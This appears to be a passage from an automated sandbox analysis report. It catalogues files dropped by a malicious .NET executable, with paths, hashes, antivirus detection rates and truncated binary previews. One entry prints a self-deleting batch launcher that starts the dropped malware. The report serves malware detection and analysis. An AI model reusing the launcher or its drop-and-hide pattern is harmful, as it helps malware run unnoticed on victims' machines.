Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@............@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......T...\...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Recovery\9bce06a9fec5b2

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	197
Entropy (8bit):	5.756222698628844
Encrypted:	false
SSDEEP:	3:cCaa2dMZfGVF0Cdw7zHYQ/EgWSX8FqmRCdxueUuA8auSt+W8NXeSwNaIIiV:cCH2dMZ+P0CS7zd/aSX8Fq7f4d+B68s
MD5:	974B7B5B42C993287DCD9E02BA92818D
SHA1:	EE7B2358B923567506F7E335AB2572E913EACAED
SHA-256:	0539870B91D0C77D2CDCB496A0455B1B59521321ACF4F4AACF61E4143C5BCF10
SHA-512:	41159AC082C7793421FC4833347517B614268B7A7551DF59B11F44D1F5F7DD1452B6E4C4B5CF090192CC156B88275185E6CE7AAA5BDDF84B8479EFA22B8F40D9
Malicious:	false
Preview:	eA344rDa6mUNMEhi1BoxcxUuQTGvrzGhwYVdp8vEHHOaxAAacboWUosrpIokkRtGgxbysE32QkqVi47PSqTPKuNHpnxgUKdzXI3AiMrYhwFt7WJvLYR48e5vjTIEQXiFG18ZA7qF85rYodJSeCU52j03MIaOEmHKOAnGYtuOrL5DwhGGK0kOCmMgAFN2gbBVxhKo0

C:\Recovery\qBJICEqiLNwXNBLrN.exe

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1300992
Entropy (8bit):	5.0586566573608085
Encrypted:	false
SSDEEP:	24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
MD5:	295BF8D9B734730EFA567C8DA9918FE1
SHA1:	09AABC018DA124BD0EBE8E1043860015AC71AA34
SHA-256:	7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
SHA-512:	C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79% Antivirus: Virustotal, Detection: 69%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@............@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......T...\...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BlockrefBrokerperf.exe.log

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1698
Entropy (8bit):	5.367720686892084
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1GqZ4x
MD5:	5E2B46F197ED0B7FCCD1F26C008C2CD1
SHA1:	17B1F616C3D13F341565C71A7520BD788BCCC07D
SHA-256:	AF902415FD3BA2B023D7ACE463D9EB77114FC3678073C0FFD66A1728578FD265
SHA-512:	5E6CEEFD6744B078ADA7E188AEC87CD4EE7FDAD5A9CC661C8217AC0A177013370277A381DFE8FF2BC237F48A256E1144223451ED2EC292C00811C14204993B50
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\9bce06a9fec5b2

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	ASCII text, with very long lines (696), with no line terminators
Category:	dropped
Size (bytes):	696
Entropy (8bit):	5.900633508358525
Encrypted:	false
SSDEEP:	12:HpxwWUaiD2/KsY8o6JdxGez9emf0uYW9n2am0X6UWsjCWgrL5Ey3RUIKj:HgWUnjEoEdx/omfY30XHWUCzrLyaUhj
MD5:	0505E50AA718C382870B6A9524387898
SHA1:	C0B6D8D00202CA1155F308BA95F96EA5FD85BF14
SHA-256:	763A0C28A91061B82C96A962DBB44E7163C64FDB6886C7ED4594FF013A510571
SHA-512:	57FD122CA2990180BC422C8C5080C833334BA7835F8D680FC18E9B810E778AB21B796F02AFDFEB7A36FE8451748B1E3FA3901A7A6C3C86EB1E69CB6ECC63265C
Malicious:	false
Preview:	nxGpBUEOC3HlxGGSg2rPKkPPWbQH5z66Yf2M8h0MXxS4Zi1t6lOZZ8gDh0SjE7SN6LNRN3U9Ce2WRV0ykgKUlhhZ9zoIOQIZfF8OVkfDROW4GKwMAe9hx7lYoySYOMuvWc1LWmcAAGDWKnSyCbHtRllidjkgSHyEelinTlzYB9gq3PNBfdWwEAeu1SrxC5r3S82jEpfamsrRE5oOVjBzvBAdGxwA3CWFRnY4Xo6075KVSMq5ndcd42HQ8ZdR2fhjWlAbhu1rmL100oK4H0Wak3LYfH58Lo7cXl9qLOY3mu0tBRZUOiKCIG9dal6Zy3g8NZcPpds2bcyzDbXNrltmd5TRlfQkS9FsN1flzKpv0SkqSJa8NssNJ4fRFLoJMIkcXFlL6vYh67vLVn8bFRWjQ1jTWNgogfisrHSMhOCcULRLIT6cMME5vBLfgSzsPtBaZDdNVw30P4OFkXLCREbTbn6q5wqPZUMkJ0wEzsHaSNq1xF5JGwaLSr9vHxRiFoa4rn5ukGMi6BBN7F201hJn3ASc1A7CbiUowvJKJKi9j2ORpvyC4bqifxAqUd2kJKHYqXbL5sqq8JEBwBxGL5H92wI9vczqS80Yu0kRTmGMu9jVt84TpvYOCHf3Ocac3AYASpQ5afwiy5P2MwPwigAgjmVnUrD1MoTuliDEs82K9zZH2nqbMo4W91bq

C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\qBJICEqiLNwXNBLrN.exe

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1300992
Entropy (8bit):	5.0586566573608085
Encrypted:	false
SSDEEP:	24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
MD5:	295BF8D9B734730EFA567C8DA9918FE1
SHA1:	09AABC018DA124BD0EBE8E1043860015AC71AA34
SHA-256:	7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
SHA-512:	C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79% Antivirus: Virustotal, Detection: 69%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@............@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......T...\...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	175
Entropy (8bit):	5.175572355642595
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1U9lEwYAfNHyBktKcKZG1Ukh4E2J5xAI+p4H:hCRLuVFOOr+DE1olSKOZG1923f+pK
MD5:	4B484B4B5F2B9A6B45CFF925090291EF
SHA1:	478A28087A025849F722EA237FD19C5D3E6B4F78
SHA-256:	D02D3BF6564D23517300726E1A4FCB2C949A7E3700B70A9BD98E226557FF9CA8
SHA-512:	A9701F6689ACCFF43ACF81AFAA657CDAAEC0CC3E17AC4569CA8FCD259CF32F05BA3D5C123F95535637D5ACB58F844CDED4DBE5A98FE5659507D01C5DBA0A2A87
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\XJsEcPfXWC.bat"

C:\Users\user\AppData\Local\Temp\nltb4WKmeR

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.133660689688186
Encrypted:	false
SSDEEP:	3:zPhN9K4vtyQgn:jh2441
MD5:	C5BD9470B83AF69B3B6BB6D6DC4AA763
SHA1:	51C96FFDD6D383245588463BAE4C4D48FCA2D043
SHA-256:	AA75D92D2296D1D304F31B1D5D1CB308312CF3A7670044CBE2D08D14B137B21C
SHA-512:	14BC25C6AECFC5219ABBC0EAD7D4AF2771457387581BB4D09143888511DE215B9E5F83C46043DC24D24A8A2327D88C54A7FA512F7EF3D87521BB93B3BDA4D178
Malicious:	false
Preview:	otLEjn0huMOvrAlpht6vtHWuE

C:\Users\user\Contacts\9bce06a9fec5b2

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	ASCII text, with very long lines (744), with no line terminators
Category:	dropped
Size (bytes):	744
Entropy (8bit):	5.896392545627124
Encrypted:	false
SSDEEP:	12:jOAhvl1WSJzeTNlw4z8eakeN56tZQ+jd33qgLQUDz7sf2Fm7T/h6w5OEoENg2wfZ:jV3EKyT0w8eamxqGQY8XTxYEok4m1Tjc
MD5:	57EAE854B5DA95F1BE6521E8455D79CF
SHA1:	BBBB4F3CD780E8E64254037D05B1024121FB2B16
SHA-256:	28D1630FABF1F1BF12161E5AF8DB0EA7CD11899B320EE986976A037B18B1C2C9
SHA-512:	777C7A4CF28D76E355D800B1A786BDB482A8B893A70BB24C65421604293A01C79495E47E7FCC3F7E78C5507E4880ED9424653435D1A5B093309B1234873A246D
Malicious:	false
Preview:	Co05NlEQowROTkKDEGpsnjKSu21mOUKj8BSBazpb9F8tSHLwUemNfbGdeiLVtcCTlrPRRJnObOthlbAmqFSus7Eg5zh1oTshDoHk13eL0XwRsi1CiionKRlonsWblvkHgLe6UZuxkH3ULwyW7eTFoEXwCd6IgDjFwougE5sIy1DCXQc149dGbfdcyr40cmQhhyihBRSCwLRwBUZvAFNgjcoRKSrWA1pLkffjs5znqbUQOqaeSI0XYu8FJQWsj6C4fFMfzzCFQkzIHYCe1NE1BSx0hZZciGEuYauJe5pcGuGx407vN21V2K2NRV8ZakhKgFtrn396ilvRL96rcnOpPs2Ohh1I7QBfN6RzHQHT24xQZlBRZR6wW14xMfJGC19SjPEPrGjMg4wU4ly6gjspTPJVBemlGBRB5fqKgvkSruQcEk2kqMjdIT9UGtNNe8FenvZZ5oZu9Z8i8qQblB43by3mgWDxiWytpwzTKdpCwzdsUaVZcvmcDLCy2w3jkmLmlP3M17QHW2HmUKRFAoVxuVpdtAbYkGbKn0GEhJhfeeGKEaerexi6QY2QjZc1g2hPa68dDNh1G0SPOfZTgt3whf3O80eIqq9l61uHbAoRQrzaGmCE9JVw9vs5CtfNsZLa1qTXuR2fFlgzpdIVyaIgVMlLIzFreaj0gZjZTpUrQzrYP2PjlKZSQoFoFIO5MKBoBpTQ3tBJFaQfeM5PkgGUBRj1T4TLaYfGyDXjj8p1

C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1300992
Entropy (8bit):	5.0586566573608085
Encrypted:	false
SSDEEP:	24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
MD5:	295BF8D9B734730EFA567C8DA9918FE1
SHA1:	09AABC018DA124BD0EBE8E1043860015AC71AA34
SHA-256:	7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
SHA-512:	C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79% Antivirus: Virustotal, Detection: 69%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@............@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......T...\...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\BfMGYDNR.log

Download File

Process:	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3% Antivirus: Virustotal, Detection: 4%, Browse
Joe Sandbox View:	Filename: LabyMod.exe, Detection: malicious, Browse Filename: jWPW3CjSsa.exe, Detection: malicious, Browse Filename: 6v2t5igkn8.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 68ebff4655ce8e3641602b31a0f12adcd4f5d0813604655a309fd881.exe, Detection: malicious, Browse Filename: Sentares_Hack_#U2014_#U043a#U043e#U043f#U0438#U044f.exe, Detection: malicious, Browse Filename: LYOTMT26Vl.exe, Detection: malicious, Browse Filename: 4J576dHwVU.exe, Detection: malicious, Browse Filename: sw9ofrTPS0.exe, Detection: malicious, Browse Filename: jHednJXHgj.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BhRGcQzx.log

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5% Antivirus: Virustotal, Detection: 9%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BnwYCmoX.log

Download File

Process:	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 8% Antivirus: Virustotal, Detection: 13%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\ESwXjeKp.log

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5% Antivirus: Virustotal, Detection: 4%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GVjFENOl.log

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 5% Antivirus: Virustotal, Detection: 7%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GbOXfjDL.log

Download File

Process:	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 5% Antivirus: Virustotal, Detection: 7%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HJnNqbKj.log

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 34% Antivirus: Virustotal, Detection: 33%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\KWPomPtF.log

Download File

Process:	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 34% Antivirus: Virustotal, Detection: 33%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\MTqwIPIz.log

Download File

Process:	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 5% Antivirus: Virustotal, Detection: 4%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NBQmTGPX.log

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
